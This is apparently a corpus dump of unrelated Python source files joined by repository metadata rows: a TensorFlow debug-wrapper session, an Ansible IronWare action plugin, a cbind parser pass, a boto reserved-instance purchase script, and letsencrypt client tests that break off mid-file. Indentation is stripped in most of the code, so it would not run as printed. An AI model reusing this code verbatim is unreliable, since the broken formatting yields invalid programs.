class BaseDebugWrapperSession(session.SessionInterface):
"""Base class of debug-wrapper session classes.
Concrete classes that inherit from this class need to implement the abstract
methods such as on_session_init, on_run_start and on_run_end.
"""
# TODO(cais): Add on_cont_start and on_cont_end callbacks once the stepper
# is available.
def __init__(self, sess, thread_name_filter=None):
"""Constructor of `BaseDebugWrapperSession`.
Args:
sess: An (unwrapped) TensorFlow session instance.
thread_name_filter: Regular-expression filter (whitelist) for name(s) of
thread(s) on which the wrapper session will be active. This regular
expression is used in a start-anchored fashion on the thread name, i.e.,
by applying the `match` method of the compiled pattern. The default
`None` means that the wrapper session will be active on all threads.
E.g., r"MainThread$", r"QueueRunnerThread.*".
Raises:
ValueError: On invalid `OnSessionInitAction` value.
NotImplementedError: If a non-DirectSession sess object is received.
"""
_check_type(sess, session.BaseSession)
# The session being wrapped.
self._sess = sess
self._thread_name_filter_pattern = (re.compile(thread_name_filter)
if thread_name_filter else None)
# Keeps track of number of run calls that have been performed on this
# debug-wrapper session.
self._run_call_count = 0
# Invoke on-session-init callback.
response = self.on_session_init(OnSessionInitRequest(self._sess))
_check_type(response, OnSessionInitResponse)
if response.action == OnSessionInitAction.PROCEED:
pass
elif response.action == OnSessionInitAction.REMOTE_INSTR_LOOP:
# TODO(cais): Implement REMOTE_INSTR_LOOP
raise NotImplementedError(
"OnSessionInitAction REMOTE_INSTR_LOOP has not been "
"implemented.")
else:
raise ValueError(
"Invalid OnSessionInitAction value: %s" % response.action)
@property
def graph(self):
return self._sess.graph
@property
def graph_def(self):
return self._sess.graph_def
@property
def sess_str(self):
return self._sess.sess_str
@property
def session(self):
return self._sess
def as_default(self):
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Wrapper around Session.run() that inserts tensor watch options.
Args:
fetches: Same as the `fetches` arg to regular `Session.run()`.
feed_dict: Same as the `feed_dict` arg to regular `Session.run()`.
options: Same as the `options` arg to regular `Session.run()`.
run_metadata: Same as the `run_metadata` arg to regular `Session.run()`.
Returns:
Simply forwards the output of the wrapped `Session.run()` call.
Raises:
ValueError: On invalid `OnRunStartAction` value.
"""
self._run_call_count += 1
if self._is_disabled_thread():
return self._sess.run(fetches,
feed_dict=feed_dict,
options=options,
run_metadata=run_metadata)
# Invoke on-run-start callback and obtain response.
run_start_resp = self.on_run_start(
OnRunStartRequest(fetches, feed_dict, options, run_metadata,
self._run_call_count))
_check_type(run_start_resp, OnRunStartResponse)
if run_start_resp.action == OnRunStartAction.DEBUG_RUN:
# Decorate RunOption to fill in debugger tensor watch specifications.
decorated_run_options = options or config_pb2.RunOptions()
run_metadata = run_metadata or config_pb2.RunMetadata()
self._decorate_run_options_for_debug(
decorated_run_options,
run_start_resp.debug_urls,
debug_ops=run_start_resp.debug_ops,
node_name_regex_whitelist=run_start_resp.node_name_regex_whitelist,
op_type_regex_whitelist=run_start_resp.op_type_regex_whitelist,
tensor_dtype_regex_whitelist=(
run_start_resp.tensor_dtype_regex_whitelist),
tolerate_debug_op_creation_failures=(
run_start_resp.tolerate_debug_op_creation_failures))
# Invoke the run() method of the wrapped Session. Catch any TensorFlow
# runtime errors.
tf_error = None
try:
retvals = self._sess.run(fetches,
feed_dict=feed_dict,
options=decorated_run_options,
run_metadata=run_metadata)
except errors.OpError as op_error:
tf_error = op_error
retvals = op_error
run_end_req = OnRunEndRequest(
run_start_resp.action,
run_metadata=run_metadata,
client_graph_def=self._sess.graph.as_graph_def(),
tf_error=tf_error)
elif run_start_resp.action == OnRunStartAction.PROFILE_RUN:
decorated_run_options = options or config_pb2.RunOptions()
run_metadata = run_metadata or config_pb2.RunMetadata()
self._decorate_run_options_for_profile(decorated_run_options)
retvals = self._sess.run(fetches,
feed_dict=feed_dict,
options=decorated_run_options,
run_metadata=run_metadata)
run_end_req = OnRunEndRequest(
run_start_resp.action,
run_metadata=run_metadata,
client_graph_def=self._sess.graph.as_graph_def())
elif (run_start_resp.action == OnRunStartAction.NON_DEBUG_RUN or
run_start_resp.action == OnRunStartAction.INVOKE_STEPPER):
if run_start_resp.action == OnRunStartAction.INVOKE_STEPPER:
with stepper.NodeStepper(
self._sess, fetches, feed_dict) as node_stepper:
retvals = self.invoke_node_stepper(
node_stepper, restore_variable_values_on_exit=True)
      else:
        # Invoke run() method of the wrapped session. Without this else
        # branch, the stepper's return values would be clobbered by a second,
        # unconditional run() call.
        retvals = self._sess.run(
            fetches,
            feed_dict=feed_dict,
            options=options,
            run_metadata=run_metadata)
# Prepare arg for the on-run-end callback.
run_end_req = OnRunEndRequest(run_start_resp.action)
else:
raise ValueError(
"Invalid OnRunStartAction value: %s" % run_start_resp.action)
# Invoke on-run-end callback and obtain response.
run_end_resp = self.on_run_end(run_end_req)
_check_type(run_end_resp, OnRunEndResponse)
# Currently run_end_resp is only a placeholder. No action is taken on it.
return retvals
def _is_disabled_thread(self):
thread_name = threading.current_thread().name or ""
return (self._thread_name_filter_pattern and
not self._thread_name_filter_pattern.match(thread_name))
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError(
"partial_run_setup is not implemented for debug-wrapper sessions.")
def partial_run(self, handle, fetches, feed_dict=None):
raise NotImplementedError(
"partial_run is not implemented for debug-wrapper sessions.")
def _decorate_run_options_for_debug(
self,
run_options,
debug_urls,
debug_ops="DebugIdentity",
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Modify a RunOptions object for debug tensor watching.
Specifies request for outputting partition graphs. Adds
debug_tensor_watch_opts with proper debug URLs.
Args:
run_options: (RunOptions) the modified RunOptions object.
debug_urls: (list of str) debug URLs to be entered in run_options.
debug_tensor_watch_opts.
debug_ops: (str or list of str) debug op(s) to be used by the debugger.
node_name_regex_whitelist: Regular-expression whitelist for node
name.
op_type_regex_whitelist: Regular-expression whitelist for op type.
tensor_dtype_regex_whitelist: Regular-expression whitelist for tensor
dtype.
tolerate_debug_op_creation_failures: Whether debug op creation failures
are to be tolerated.
"""
run_options.output_partition_graphs = True
debug_utils.watch_graph(
run_options,
self._sess.graph,
debug_urls=debug_urls,
debug_ops=debug_ops,
node_name_regex_whitelist=node_name_regex_whitelist,
op_type_regex_whitelist=op_type_regex_whitelist,
tensor_dtype_regex_whitelist=tensor_dtype_regex_whitelist,
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures)
def _decorate_run_options_for_profile(self, run_options):
"""Modify a RunOptions object for profiling TensorFlow graph execution.
Args:
run_options: (RunOptions) the modified RunOptions object.
"""
run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
@abc.abstractmethod
def on_session_init(self, request):
"""Callback invoked during construction of the debug-wrapper session.
This is a blocking callback.
The invocation happens right before the constructor ends.
Args:
request: (`OnSessionInitRequest`) callback request carrying information
such as the session being wrapped.
Returns:
An instance of `OnSessionInitResponse`.
"""
@abc.abstractmethod
def on_run_start(self, request):
"""Callback invoked on run() calls to the debug-wrapper session.
This is a blocking callback.
The invocation happens after the wrapper's run() call is entered,
after an increment of run call counter.
Args:
request: (`OnRunStartRequest`) callback request object carrying
information about the run call such as the fetches, feed dict, run
options, run metadata, and how many `run()` calls to this wrapper
session have occurred.
Returns:
An instance of `OnRunStartResponse`, carrying information to
1) direct the wrapper session to perform a specified action (e.g., run
with or without debug tensor watching, invoking the stepper).
2) debug URLs used to watch the tensors.
"""
@abc.abstractmethod
def on_run_end(self, request):
"""Callback invoked on run() calls to the debug-wrapper session.
This is a blocking callback.
The invocation happens right before the wrapper exits its run() call.
Args:
request: (`OnRunEndRequest`) callback request object carrying information
such as the actual action performed by the session wrapper for the
run() call.
Returns:
An instance of `OnRunEndResponse`.
"""
def __enter__(self):
return self._sess.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
self._sess.__exit__(exec_type, exec_value, exec_tb)
def close(self):
self._sess.close()
# TODO(cais): Add _node_name_regex_whitelist and
# _node_op_type_regex_whitelist.
@abc.abstractmethod
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""Callback invoked when the client intends to step through graph nodes.
Args:
node_stepper: (stepper.NodeStepper) An instance of NodeStepper to be used
in this stepping session.
restore_variable_values_on_exit: (bool) Whether any variables whose values
have been altered during this node-stepper invocation should be restored
to their old values when this invocation ends.
Returns:
The same return values as the `Session.run()` call on the same fetches as
the NodeStepper.
"""
class WatchOptions(object):
"""Type for return values of watch_fn."""
def __init__(self,
debug_ops=None,
node_name_regex_whitelist=None,
op_type_regex_whitelist=None,
tensor_dtype_regex_whitelist=None,
tolerate_debug_op_creation_failures=False):
"""Constructor of WatchOptions: Debug watch options.
Used as return values of `watch_fn`s.
Args:
debug_ops: (`str` or `list of str`) Debug ops to be used.
node_name_regex_whitelist: Regular-expression whitelist for node_name,
e.g., `"(weight_[0-9]+|bias_.*)"`
op_type_regex_whitelist: Regular-expression whitelist for the op type of
nodes, e.g., `"(Variable|Add)"`.
If both `node_name_regex_whitelist` and `op_type_regex_whitelist`
are set, the two filtering operations will occur in a logical `AND`
relation. In other words, a node will be included if and only if it
hits both whitelists.
tensor_dtype_regex_whitelist: Regular-expression whitelist for Tensor
data type, e.g., `"^int.*"`.
This whitelist operates in logical `AND` relations to the two whitelists
above.
tolerate_debug_op_creation_failures: (`bool`) whether debug op creation
failures (e.g., due to dtype incompatibility) are to be tolerated by not
throwing exceptions.
"""
if debug_ops:
self.debug_ops = debug_ops
else:
self.debug_ops = ["DebugIdentity"]
self.node_name_regex_whitelist = node_name_regex_whitelist
self.op_type_regex_whitelist = op_type_regex_whitelist
self.tensor_dtype_regex_whitelist = tensor_dtype_regex_whitelist
self.tolerate_debug_op_creation_failures = (
tolerate_debug_op_creation_failures)
def __repr__(self):
return ("WatchOptions(debug_ops=%r, node_name_regex_whitelist=%r, "
"op_type_regex_whitelist=%r, tensor_dtype_regex_whitelist=%r, "
"tolerate_debug_op_creation_failures=%r)" % (
self.debug_ops, self.node_name_regex_whitelist,
self.op_type_regex_whitelist, self.tensor_dtype_regex_whitelist,
self.tolerate_debug_op_creation_failures))
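# Illustrative sketch (not part of the original file): because the whitelists
# combine in a logical AND relation, the options below watch only nodes whose
# names start with "weight_" or "bias_" AND whose op type matches
# "Variable.*". The regex values are examples, not defaults.
#
# opts = WatchOptions(
#     debug_ops=["DebugIdentity"],
#     node_name_regex_whitelist=r"(weight_|bias_).*",
#     op_type_regex_whitelist=r"Variable.*")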
class NonInteractiveDebugWrapperSession(BaseDebugWrapperSession):
"""Base class for non-interactive (i.e., non-CLI) debug wrapper sessions."""
def __init__(self, sess, watch_fn=None, thread_name_filter=None):
"""Constructor of DumpingDebugWrapperSession.
Args:
sess: The TensorFlow `Session` object being wrapped.
watch_fn: (`Callable`) A Callable that maps the fetches and feeds of a
debugged `Session.run()` call to `WatchOptions`.
* Args:
* `fetches`: the fetches to the `Session.run()` call.
* `feeds`: the feeds to the `Session.run()` call.
* Returns:
(`tf_debug.WatchOptions`) An object containing debug options including
the debug ops to use, the node names, op types and/or tensor data
types to watch, etc. See the documentation of `tf_debug.WatchOptions`
for more details.
thread_name_filter: Regular-expression white list for threads on which the
wrapper session will be active. See doc of `BaseDebugWrapperSession` for
more details.
Raises:
TypeError: If a non-None `watch_fn` is specified and it is not callable.
"""
BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
self._watch_fn = None
if watch_fn is not None:
if not callable(watch_fn):
raise TypeError("watch_fn is not callable")
self._watch_fn = watch_fn
def on_session_init(self, request):
"""See doc of BaseDebugWrapperSession.on_run_start."""
return OnSessionInitResponse(OnSessionInitAction.PROCEED)
@abc.abstractmethod
def prepare_run_debug_urls(self, fetches, feed_dict):
"""Abstract method to be implemented by concrete subclasses.
This method prepares the run-specific debug URL(s).
Args:
fetches: Same as the `fetches` argument to `Session.run()`
feed_dict: Same as the `feed_dict` argument to `Session.run()`
Returns:
debug_urls: (`str` or `list` of `str`) Debug URLs to be used in
this `Session.run()` call.
"""
def on_run_start(self, request):
"""See doc of BaseDebugWrapperSession.on_run_start."""
debug_urls, watch_opts = self._prepare_run_watch_config(
request.fetches, request.feed_dict)
return OnRunStartResponse(
OnRunStartAction.DEBUG_RUN,
debug_urls,
debug_ops=watch_opts.debug_ops,
node_name_regex_whitelist=watch_opts.node_name_regex_whitelist,
op_type_regex_whitelist=watch_opts.op_type_regex_whitelist,
tensor_dtype_regex_whitelist=watch_opts.tensor_dtype_regex_whitelist,
tolerate_debug_op_creation_failures=(
watch_opts.tolerate_debug_op_creation_failures))
def _prepare_run_watch_config(self, fetches, feed_dict):
"""Get the debug_urls, and node/op whitelists for the current run() call.
Args:
fetches: Same as the `fetches` argument to `Session.run()`.
feed_dict: Same as the `feed_dict` argument to `Session.run()`.
Returns:
debug_urls: (str or list of str) Debug URLs for the current run() call.
Currently, the list consists of only one URL that is a file:// URL.
watch_options: (WatchOptions) The return value of a watch_fn, containing
options including debug_ops, and whitelists.
"""
debug_urls = self.prepare_run_debug_urls(fetches, feed_dict)
if self._watch_fn is None:
watch_options = WatchOptions()
else:
watch_options = self._watch_fn(fetches, feed_dict)
if isinstance(watch_options, tuple):
# For legacy return type (tuples).
watch_options = WatchOptions(*watch_options)
return debug_urls, watch_options
def on_run_end(self, request):
"""See doc of BaseDebugWrapperSession.on_run_end."""
return OnRunEndResponse()
def invoke_node_stepper(self,
node_stepper,
restore_variable_values_on_exit=True):
"""See doc of BaseDebugWrapperSession.invoke_node_stepper."""
raise NotImplementedError(
"NonInteractiveDebugWrapperSession does not support node-stepper mode.")
| mit |
tdtrask/ansible | lib/ansible/plugins/action/ironware.py | 10 | 3719 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import copy
import json
from ansible import constants as C
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.module_utils.network.common.utils import load_provider
from ansible.module_utils.network.ironware.ironware import ironware_provider_spec
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = load_provider(ironware_provider_spec, self._task.args)
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'ironware'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = int(provider['port'] or self._play_context.port or 22)
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = int(provider['timeout'] or C.PERSISTENT_COMMAND_TIMEOUT)
pc.become = provider['authorize'] or False
if pc.become:
pc.become_method = 'enable'
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s (was local)' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = connection.run()
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not socket_path:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
# make sure we are in the right cli context, which should be
# enable mode and not config mode
conn = Connection(socket_path)
out = conn.get_prompt()
if to_text(out, errors='surrogate_then_replace').strip().endswith(')#'):
display.vvvv('wrong context, sending end to device', self._play_context.remote_addr)
conn.send_command('end')
task_vars['ansible_socket'] = socket_path
if self._play_context.become_method == 'enable':
self._play_context.become = False
self._play_context.become_method = None
result = super(ActionModule, self).run(tmp, task_vars)
return result
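# Illustrative sketch (not part of the original file): the shape of the
# provider dict this action plugin reads via load_provider() above. The key
# names mirror the attributes accessed in run(); all values are placeholders.
#
# provider = {
#     'host': '192.0.2.1',          # falls back to the play context address
#     'port': 22,                   # defaults to 22 when unset
#     'username': 'admin',
#     'password': 'secret',
#     'ssh_keyfile': None,
#     'timeout': 10,                # defaults to C.PERSISTENT_COMMAND_TIMEOUT
#     'authorize': True,            # triggers become_method = 'enable'
#     'auth_pass': 'enable-secret',
# }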
| gpl-3.0 |
anthrotype/ctypes-binding-generator | cbind/passes/forward_decl.py | 2 | 1277 | # Copyright (C) 2013 Che-Liang Chiou.
'''Scan syntax tree for forward declarations.'''
from cbind.cindex import CursorKind
from cbind.passes.util import traverse_postorder, strip_type
import cbind.annotations as annotations
def scan_forward_decl(syntax_tree):
'''Scan syntax tree for forward declarations.'''
has_seen = set()
traverse_postorder(syntax_tree, lambda tree: _scan_tree(tree, has_seen))
def _scan_tree(tree, has_seen):
'''Scan tree for forward declarations.'''
if tree.is_user_defined_type_decl():
has_seen.add(tree)
if tree.kind == CursorKind.FUNCTION_DECL:
for type_ in tree.type.get_argument_types():
_scan_type_forward_decl(type_, has_seen)
_scan_type_forward_decl(tree.result_type, has_seen)
else:
_scan_type_forward_decl(tree.type, has_seen)
def _scan_type_forward_decl(type_, has_seen):
'''Scan type for forward declarations.'''
if type_.is_user_defined_type():
tree = type_.get_declaration()
if tree.is_user_defined_type_decl() and tree not in has_seen:
tree.annotate(annotations.FORWARD_DECLARATION, True)
return
stripped_type = strip_type(type_)
if stripped_type:
_scan_type_forward_decl(stripped_type, has_seen)
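# Illustrative example (not part of the original file): given C code such as
#
#   void consume(struct blob *b);   /* uses struct blob before its definition */
#   struct blob { int size; };
#
# the FUNCTION_DECL branch in _scan_tree() inspects the argument type
# "struct blob *", _scan_type_forward_decl()/strip_type() reduce it to the
# declaration of "struct blob", and because that declaration has not yet been
# visited by the post-order traversal it is annotated with
# annotations.FORWARD_DECLARATION.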
| gpl-3.0 |
benschmaus/catapult | third_party/gsutil/third_party/boto/boto/ec2/buyreservation.py | 152 | 3838 | # Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto.ec2
from boto.sdb.db.property import StringProperty, IntegerProperty
from boto.manage import propget
from boto.compat import six
InstanceTypes = ['m1.small', 'm1.large', 'm1.xlarge',
'c1.medium', 'c1.xlarge', 'm2.xlarge',
'm2.2xlarge', 'm2.4xlarge', 'cc1.4xlarge',
't1.micro']
class BuyReservation(object):
def get_region(self, params):
if not params.get('region', None):
prop = StringProperty(name='region', verbose_name='EC2 Region',
choices=boto.ec2.regions)
params['region'] = propget.get(prop, choices=boto.ec2.regions)
def get_instance_type(self, params):
if not params.get('instance_type', None):
prop = StringProperty(name='instance_type', verbose_name='Instance Type',
choices=InstanceTypes)
params['instance_type'] = propget.get(prop)
def get_quantity(self, params):
if not params.get('quantity', None):
prop = IntegerProperty(name='quantity', verbose_name='Number of Instances')
params['quantity'] = propget.get(prop)
def get_zone(self, params):
if not params.get('zone', None):
prop = StringProperty(name='zone', verbose_name='EC2 Availability Zone',
choices=self.ec2.get_all_zones)
params['zone'] = propget.get(prop)
def get(self, params):
self.get_region(params)
self.ec2 = params['region'].connect()
self.get_instance_type(params)
self.get_zone(params)
self.get_quantity(params)
if __name__ == "__main__":
obj = BuyReservation()
params = {}
obj.get(params)
offerings = obj.ec2.get_all_reserved_instances_offerings(instance_type=params['instance_type'],
availability_zone=params['zone'].name)
print('\nThe following Reserved Instances Offerings are available:\n')
for offering in offerings:
offering.describe()
prop = StringProperty(name='offering', verbose_name='Offering',
choices=offerings)
offering = propget.get(prop)
print('\nYou have chosen this offering:')
offering.describe()
unit_price = float(offering.fixed_price)
total_price = unit_price * params['quantity']
print('!!! You are about to purchase %d of these offerings for a total of $%.2f !!!' % (params['quantity'], total_price))
answer = six.moves.input('Are you sure you want to do this? If so, enter YES: ')
if answer.strip().lower() == 'yes':
offering.purchase(params['quantity'])
else:
print('Purchase cancelled')
| bsd-3-clause |
lmcro/letsencrypt | letsencrypt/tests/client_test.py | 2 | 20361 | """Tests for letsencrypt.client."""
import os
import shutil
import tempfile
import unittest
import OpenSSL
import mock
from acme import jose
from letsencrypt import account
from letsencrypt import errors
from letsencrypt import le_util
from letsencrypt.tests import test_util
KEY = test_util.load_vector("rsa512_key.pem")
CSR_SAN = test_util.load_vector("csr-san.der")
class ConfigHelper(object):
"""Creates a dummy object to imitate a namespace object
Example: cfg = ConfigHelper(redirect=True, hsts=False, uir=False)
will result in: cfg.redirect=True, cfg.hsts=False, etc.
"""
def __init__(self, **kwds):
self.__dict__.update(kwds)
class RegisterTest(unittest.TestCase):
"""Tests for letsencrypt.client.register."""
def setUp(self):
self.config = mock.MagicMock(rsa_key_size=1024, register_unsafely_without_email=False)
self.account_storage = account.AccountMemoryStorage()
self.tos_cb = mock.MagicMock()
def _call(self):
from letsencrypt.client import register
return register(self.config, self.account_storage, self.tos_cb)
def test_no_tos(self):
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client.register().terms_of_service = "http://tos"
with mock.patch("letsencrypt.account.report_new_account"):
self.tos_cb.return_value = False
self.assertRaises(errors.Error, self._call)
self.tos_cb.return_value = True
self._call()
self.tos_cb = None
self._call()
def test_it(self):
with mock.patch("letsencrypt.client.acme_client.Client"):
with mock.patch("letsencrypt.account.report_new_account"):
self._call()
@mock.patch("letsencrypt.account.report_new_account")
@mock.patch("letsencrypt.client.display_ops.get_email")
def test_email_retry(self, _rep, mock_get_email):
from acme import messages
msg = "DNS problem: NXDOMAIN looking up MX for example.com"
mx_err = messages.Error(detail=msg, typ="urn:acme:error:invalidEmail")
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client().register.side_effect = [mx_err, mock.MagicMock()]
self._call()
self.assertEqual(mock_get_email.call_count, 1)
def test_needs_email(self):
self.config.email = None
self.assertRaises(errors.Error, self._call)
@mock.patch("letsencrypt.client.logger")
def test_without_email(self, mock_logger):
with mock.patch("letsencrypt.client.acme_client.Client"):
with mock.patch("letsencrypt.account.report_new_account"):
self.config.email = None
self.config.register_unsafely_without_email = True
self.config.dry_run = False
self._call()
mock_logger.warn.assert_called_once_with(mock.ANY)
def test_unsupported_error(self):
from acme import messages
msg = "Test"
mx_err = messages.Error(detail=msg, typ="malformed", title="title")
with mock.patch("letsencrypt.client.acme_client.Client") as mock_client:
mock_client().register.side_effect = [mx_err, mock.MagicMock()]
self.assertRaises(messages.Error, self._call)
class ClientTest(unittest.TestCase):
"""Tests for letsencrypt.client.Client."""
def setUp(self):
self.config = mock.MagicMock(
no_verify_ssl=False, config_dir="/etc/letsencrypt", allow_subset_of_names=False)
# pylint: disable=star-args
self.account = mock.MagicMock(**{"key.pem": KEY})
self.eg_domains = ["example.com", "www.example.com"]
from letsencrypt.client import Client
with mock.patch("letsencrypt.client.acme_client.Client") as acme:
self.acme_client = acme
self.acme = acme.return_value = mock.MagicMock()
self.client = Client(
config=self.config, account_=self.account,
auth=None, installer=None)
def test_init_acme_verify_ssl(self):
net = self.acme_client.call_args[1]["net"]
self.assertTrue(net.verify_ssl)
def _mock_obtain_certificate(self):
self.client.auth_handler = mock.MagicMock()
self.client.auth_handler.get_authorizations.return_value = [None]
self.acme.request_issuance.return_value = mock.sentinel.certr
self.acme.fetch_chain.return_value = mock.sentinel.chain
def _check_obtain_certificate(self):
self.client.auth_handler.get_authorizations.assert_called_once_with(
self.eg_domains,
self.config.allow_subset_of_names)
authzr = self.client.auth_handler.get_authorizations()
self.acme.request_issuance.assert_called_once_with(
jose.ComparableX509(OpenSSL.crypto.load_certificate_request(
OpenSSL.crypto.FILETYPE_ASN1, CSR_SAN)),
authzr)
self.acme.fetch_chain.assert_called_once_with(mock.sentinel.certr)
# FIXME move parts of this to test_cli.py...
@mock.patch("letsencrypt.client.logger")
def test_obtain_certificate_from_csr(self, mock_logger):
self._mock_obtain_certificate()
from letsencrypt import cli
test_csr = le_util.CSR(form="der", file=None, data=CSR_SAN)
mock_parsed_args = mock.MagicMock()
# The CLI should believe that this is a certonly request, because
# a CSR would not be allowed with other kinds of requests!
mock_parsed_args.verb = "certonly"
with mock.patch("letsencrypt.client.le_util.CSR") as mock_CSR:
mock_CSR.return_value = test_csr
mock_parsed_args.domains = self.eg_domains[:]
mock_parser = mock.MagicMock(cli.HelpfulArgumentParser)
cli.HelpfulArgumentParser.handle_csr(mock_parser, mock_parsed_args)
# Now provoke an inconsistent domains error...
mock_parsed_args.domains.append("hippopotamus.io")
self.assertRaises(errors.ConfigurationError,
cli.HelpfulArgumentParser.handle_csr, mock_parser, mock_parsed_args)
authzr = self.client.auth_handler.get_authorizations(self.eg_domains, False)
self.assertEqual(
(mock.sentinel.certr, mock.sentinel.chain),
self.client.obtain_certificate_from_csr(
self.eg_domains,
test_csr,
authzr=authzr))
# and that the cert was obtained correctly
self._check_obtain_certificate()
# Test for authzr=None
self.assertEqual(
(mock.sentinel.certr, mock.sentinel.chain),
self.client.obtain_certificate_from_csr(
self.eg_domains,
test_csr,
authzr=None))
self.client.auth_handler.get_authorizations.assert_called_with(
self.eg_domains)
# Test for no auth_handler
self.client.auth_handler = None
self.assertRaises(
errors.Error,
self.client.obtain_certificate_from_csr,
self.eg_domains,
test_csr)
mock_logger.warning.assert_called_once_with(mock.ANY)
@mock.patch("letsencrypt.client.crypto_util")
def test_obtain_certificate(self, mock_crypto_util):
self._mock_obtain_certificate()
csr = le_util.CSR(form="der", file=None, data=CSR_SAN)
mock_crypto_util.init_save_csr.return_value = csr
mock_crypto_util.init_save_key.return_value = mock.sentinel.key
domains = ["example.com", "www.example.com"]
# return_value is essentially set to (None, None) in
# _mock_obtain_certificate(), which would break this test, so it is
# overridden below.
authzr = []
for domain in domains:
authzr.append(
mock.MagicMock(
body=mock.MagicMock(
identifier=mock.MagicMock(
value=domain))))
self.client.auth_handler.get_authorizations.return_value = authzr
self.assertEqual(
self.client.obtain_certificate(domains),
(mock.sentinel.certr, mock.sentinel.chain, mock.sentinel.key, csr))
mock_crypto_util.init_save_key.assert_called_once_with(
self.config.rsa_key_size, self.config.key_dir)
mock_crypto_util.init_save_csr.assert_called_once_with(
mock.sentinel.key, domains, self.config.csr_dir)
self._check_obtain_certificate()
def test_save_certificate(self):
certs = ["matching_cert.pem", "cert.pem", "cert-san.pem"]
tmp_path = tempfile.mkdtemp()
os.chmod(tmp_path, 0o755) # TODO: really??
certr = mock.MagicMock(body=test_util.load_comparable_cert(certs[0]))
chain_cert = [test_util.load_comparable_cert(certs[1]),
test_util.load_comparable_cert(certs[2])]
candidate_cert_path = os.path.join(tmp_path, "certs", "cert.pem")
candidate_chain_path = os.path.join(tmp_path, "chains", "chain.pem")
candidate_fullchain_path = os.path.join(tmp_path, "chains", "fullchain.pem")
cert_path, chain_path, fullchain_path = self.client.save_certificate(
certr, chain_cert, candidate_cert_path, candidate_chain_path,
candidate_fullchain_path)
self.assertEqual(os.path.dirname(cert_path),
os.path.dirname(candidate_cert_path))
self.assertEqual(os.path.dirname(chain_path),
os.path.dirname(candidate_chain_path))
self.assertEqual(os.path.dirname(fullchain_path),
os.path.dirname(candidate_fullchain_path))
with open(cert_path, "r") as cert_file:
cert_contents = cert_file.read()
self.assertEqual(cert_contents, test_util.load_vector(certs[0]))
with open(chain_path, "r") as chain_file:
chain_contents = chain_file.read()
self.assertEqual(chain_contents, test_util.load_vector(certs[1]) +
test_util.load_vector(certs[2]))
shutil.rmtree(tmp_path)
def test_deploy_certificate_success(self):
self.assertRaises(errors.Error, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
installer = mock.MagicMock()
self.client.installer = installer
self.client.deploy_certificate(
["foo.bar"], "key", "cert", "chain", "fullchain")
installer.deploy_cert.assert_called_once_with(
cert_path=os.path.abspath("cert"),
chain_path=os.path.abspath("chain"),
domain='foo.bar',
fullchain_path='fullchain',
key_path=os.path.abspath("key"))
self.assertEqual(installer.save.call_count, 2)
installer.restart.assert_called_once_with()
def test_deploy_certificate_failure(self):
installer = mock.MagicMock()
self.client.installer = installer
installer.deploy_cert.side_effect = errors.PluginError
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
installer.recovery_routine.assert_called_once_with()
def test_deploy_certificate_save_failure(self):
installer = mock.MagicMock()
self.client.installer = installer
installer.save.side_effect = errors.PluginError
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
